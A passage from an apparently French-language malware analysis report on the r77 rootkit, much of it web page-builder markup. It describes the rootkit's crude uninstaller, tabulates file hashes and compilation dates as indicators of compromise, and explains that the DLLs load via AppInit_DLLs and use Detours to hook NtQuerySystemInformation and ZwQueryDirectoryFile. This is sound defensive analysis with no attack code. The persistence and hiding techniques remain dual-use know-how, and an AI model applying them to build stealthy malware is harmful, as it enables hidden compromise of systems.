class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Voici quelques d\u00e9tails techniques compl\u00e9mentaires :<\/p>\n<ul>\n<li>la version du framework .NET utilis\u00e9e est la v4.0.30319, plut\u00f4t ancienne (~2010), mais pr\u00e9sente syst\u00e9matiquement dans les OS Windows\u00a0;<\/li>\n<li>la date de compilation est cette fois situ\u00e9e dans le futur (6 d\u00e9cembre 2040), donc non exploitable. N\u00e9anmoins, cela permet d'indiquer que les ex\u00e9cutables n'ont pas tous \u00e9t\u00e9 compil\u00e9s de la m\u00eame fa\u00e7on, voire par plusieurs personnes diff\u00e9rentes\u00a0;<\/li>\n<li>un chemin vers le fichier de d\u00e9bogage est \u00e9galement pr\u00e9sent\u00a0: <code>C:\\Users\\dride\\Desktop\\New folder (3)\\ICARUS3-main\\ICARUS-main\\Stubs\\Stubs\\and\\rest\\Of\\mofos\\Junk\\and\\Stolen\\Code\\remove\\obj\\Release\\net40\\Install.pdb<\/code><\/li>\n<\/ul>\n<h5>Pr\u00e9sentation<\/h5>\n<p>Il s'agit du d\u00e9sinstallateur du rootkit r77. Le principe de d\u00e9sinstallation est minimaliste et brutal, car il consiste \u00e0 supprimer la valeur de la cl\u00e9 de registre AppInit_DLLs permettant le chargement du fichier DLL malveillant.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414137\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 18 : code de d\u00e9sinstallation du rootkit r77<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]On peut remarquer que si, lors de l'installation, trois cl\u00e9s de registres sont modifi\u00e9es, seule la cl\u00e9 <code>AppInit_DLLs<\/code> est remise \u00e0 z\u00e9ro lors de la d\u00e9sinstallation. Cela constitue un indicateur de compromission non sp\u00e9cifique de r77 mais permanent de son passage sur le syst\u00e8me. Par ailleurs, si la cl\u00e9 AppInit_DLLs \u00e9tait utilis\u00e9e par un autre logiciel, ce param\u00e9trage se fait retirer.<\/p>\n<p>De plus, le script de d\u00e9sinstallation ne supprime pas les fichiers DLL d\u00e9ploy\u00e9s lors de l'installation\u00a0; ils restent donc dans ce dossier de fa\u00e7on permanente.<\/p>\n<h4>Code malveillant des fichiers DLL de r77<\/h4>\n<h5>Carte d'identit\u00e9<\/h5>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_5\"\n     id='ninja_table_builder_414254'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_5\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414254\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6203977\" class=\"desktop-view tr_class_6203977 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_77241949\" rowspan=\"1\" colspan=\"1\" class=\"td_class_77241949\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_77241949\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_31611148\" rowspan=\"1\" colspan=\"1\" class=\"td_class_31611148\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_31611148\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_76881720\" rowspan=\"1\" colspan=\"1\" class=\"td_class_76881720\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_76881720\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7428527\" class=\"desktop-view tr_class_7428527 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_15858300\" rowspan=\"1\" colspan=\"1\" class=\"td_class_15858300\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_15858300\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_74685529\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74685529\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74685529\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">C\/C++<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_84968323\" rowspan=\"1\" colspan=\"1\" class=\"td_class_84968323\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_84968323\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">C\/C++<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8585352\" class=\"desktop-view tr_class_8585352 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_89249762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_89249762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_89249762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Architecture<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_41861492\" rowspan=\"1\" colspan=\"1\" class=\"td_class_41861492\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_41861492\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">32 bits<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_58982927\" rowspan=\"1\" colspan=\"1\" class=\"td_class_58982927\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_58982927\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">64 bits<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7148238\" class=\"desktop-view tr_class_7148238 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_78358958\" rowspan=\"1\" colspan=\"1\" class=\"td_class_78358958\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_78358958\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_73737396\" rowspan=\"1\" colspan=\"1\" class=\"td_class_73737396\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_73737396\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Wed Jul 13 17:29:32 2022<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_24527891\" rowspan=\"1\" colspan=\"1\" class=\"td_class_24527891\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_24527891\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Wed Jul 13 17:29:27 2022<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1546340\" class=\"desktop-view tr_class_1546340 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_59224734\" rowspan=\"1\" colspan=\"1\" class=\"td_class_59224734\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_59224734\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_31281813\" rowspan=\"1\" colspan=\"1\" class=\"td_class_31281813\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_31281813\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">no<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_73542868\" rowspan=\"1\" colspan=\"1\" class=\"td_class_73542868\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_73542868\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">no<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9333360\" class=\"desktop-view tr_class_9333360 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_66087210\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66087210\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66087210\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_73861368\" rowspan=\"1\" colspan=\"1\" class=\"td_class_73861368\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_73861368\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">bf2ac81c25ebc55e88af9233c6c0e1b5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_38056866\" rowspan=\"1\" colspan=\"1\" class=\"td_class_38056866\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_38056866\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">8d54e4abe1762f96134a0c874cfb8cdc<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6362894\" class=\"desktop-view tr_class_6362894 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_83104384\" rowspan=\"1\" colspan=\"1\" class=\"td_class_83104384\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_83104384\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_84631330\" rowspan=\"1\" colspan=\"1\" class=\"td_class_84631330\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_84631330\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">096d850244c31a9d4c1da7ac3b243e3f61b503d8<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_19305833\" rowspan=\"1\" colspan=\"1\" class=\"td_class_19305833\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_19305833\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">336f3fb4baa098ea4f54d881f2a2cf696e37c44e<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8597220\" class=\"desktop-view tr_class_8597220 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_78649016\" rowspan=\"1\" colspan=\"1\" class=\"td_class_78649016\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_78649016\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_44744524\" rowspan=\"1\" colspan=\"1\" class=\"td_class_44744524\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_44744524\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ed3ee849ae71001941d03983a65eacdd726be75d91b076475a89a3a75e79d82e<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_99204663\" rowspan=\"1\" colspan=\"1\" class=\"td_class_99204663\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_99204663\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">2141974f665f4d8fecb6d8ea06add624b57f320f901368847175570ee716fd8e<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6368610\" class=\"desktop-view tr_class_6368610 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_68860200\" rowspan=\"1\" colspan=\"1\" class=\"td_class_68860200\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_68860200\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_30808078\" rowspan=\"1\" colspan=\"1\" class=\"td_class_30808078\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_30808078\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24576:75+fEilGQ8Joz078UfJeOYyF42fQhz03:d+78J04r4zzW<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_18725863\" rowspan=\"1\" colspan=\"1\" class=\"td_class_18725863\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_18725863\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24576:jBm2D0GlV7LJMLMVSBsalgydd4jnYnyeiRy:M2D0mV76LMV1algAkYP<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h5>Pr\u00e9sentation<\/h5>\n<p>Chaque fichier DLL charg\u00e9 via le m\u00e9canisme <code>AppInit_DLLs<\/code> renferme le rootkit en lui-m\u00eame qui est charg\u00e9 de dissimuler les activit\u00e9s malveillantes.<\/p>\n<p>Pour atteindre cet objectif, la biblioth\u00e8que Detours (<a href=\"https:\/\/github.com\/microsoft\/detours\" target=\"_blank\" rel=\"noopener\">github.com\/microsoft\/detours<\/a>) est utilis\u00e9e. Il s'agit d'une biblioth\u00e8que permettant de placer des hooks en m\u00e9moire afin de d\u00e9tourner le flux d'ex\u00e9cution de programmes vers des fonctions d\u00e9finies par d\u00e9veloppeur, ici \u00e0 des fins malveillantes.<\/p>\n<h5>Pose de hooks<\/h5>\n<p>Les appels syst\u00e8mes <code>NtQuerySystemInformation<\/code> et <code>zwQueryDirectoryFile<\/code> sont hook\u00e9s 